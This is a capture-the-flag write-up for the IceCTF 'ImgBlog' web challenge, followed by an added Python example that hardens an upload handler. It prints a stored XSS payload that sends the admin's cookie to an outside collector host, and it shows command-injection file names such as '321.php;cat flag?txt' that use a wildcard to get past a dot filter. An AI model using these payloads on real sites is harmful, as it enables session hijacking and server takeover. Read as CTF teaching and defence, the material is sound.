[IceCTF] ImgBlog – Web130

Chall:

I found this amazing blog about Iceland! Did I ever tell you that I love Iceland? It seems to be made from scratch by a single guy although being impressive, he doesn’t seem to have much experience with web programming. Can you see if you can find any vulnerabilities to pwn his machine?

This is a nice website. First we have to log in to access some of its functions.
This challenge has 2 stages:

Stage 1: Cross-Site Scripting

Once we log in, we get a session cookie:

session=eyJ1c2VyIjozOX0.CqHuQA._9DBnFghkXsPrugp8vYM5pYUP-8  (for me)

There is also a comment area with a report button, so I was thinking about XSS.

So we construct the payload, post it as a comment, and report it to the admin to leak his cookie via stored XSS.

<img src=x onerror=this.src='http://requestb.in/1k4cnub1?z='+document.cookie>

Okay, thanks admin, I got this gift:

Hijack it:

WE ADMIN NOW!!!

Stage 2: From Upload to Command Injection

When I upload a PHP file:

And when I upload a zip file:

Even a … binary file:

So what does it all mean? A little Googling will tell you that this website uses the Linux file command to determine the type of the uploaded file.

file 123php

Because the file name is chained into that command string, command injection can be performed. Let's make a file named 123.php;ls :

Since they filter the dot (.), we can replace it with a question mark (?), which the shell treats as a single-character wildcard. The new file name is “321.php;cat flag?txt”. Easy, isn’t it?
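
The stage 2 bug seen from the defender's side, as an added example that is not part of the original write-up or the challenge's code. It assumes, as the write-up infers, that the site pastes the uploaded file name into a shell command line for file; all function names and the /srv/uploads directory are hypothetical.

```python
import secrets
import shlex
import subprocess
from pathlib import Path

def vulnerable_cmdline(filename: str) -> str:
    # Assumed vulnerable pattern: client-supplied name pasted into a shell string.
    return "file " + filename

def commands_seen_by_shell(cmdline: str) -> list:
    """Split a command line into the separate commands a POSIX shell would run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""
    commands, current = [], []
    for tok in lexer:
        if tok and set(tok) <= set(";|&"):   # control operator: a new command starts
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands

def stored_path(upload_dir: Path) -> Path:
    # Hardening 1: the server picks the on-disk name; the client's name is only metadata.
    return upload_dir / secrets.token_hex(16)

def hardened_argv(path: Path) -> list:
    # Hardening 2: argv list, run without a shell, so ";" and "?" are literal characters.
    # "--" ends option parsing in case a path ever starts with "-".
    return ["file", "--brief", "--mime-type", "--", str(path)]

def detect_type(path: Path) -> str:
    # Runs file(1) directly; no shell ever parses the path.
    result = subprocess.run(hardened_argv(path), capture_output=True,
                            text=True, check=True, timeout=5)
    return result.stdout.strip()

if __name__ == "__main__":
    for name in ("holiday.jpg", "123.php;ls"):   # constructed sample names
        print(name, "->", commands_seen_by_shell(vulnerable_cmdline(name)))
        print(name, "->", hardened_argv(Path("/srv/uploads") / name))
```

A character blacklist such as the dot filter does not change how the shell splits the string; keeping the name out of the shell entirely does.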
